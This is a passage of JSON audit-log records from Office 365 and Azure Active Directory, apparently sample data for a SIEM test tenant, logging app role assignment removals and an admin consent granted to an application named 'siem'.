"Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, 
"Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, 
{"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": 
"AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", 
"Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": 
"ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", 
"Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": 
"User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": 
"asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3393756Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118027"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": 
"AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "0031778a-80cf-49f8-aea2-f798c9bf1ec9"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"NewValue": "True", "OldValue": "", "Name": "ConsentContext.OnBehalfOfAll"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: 
AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3393756Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118027"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, 
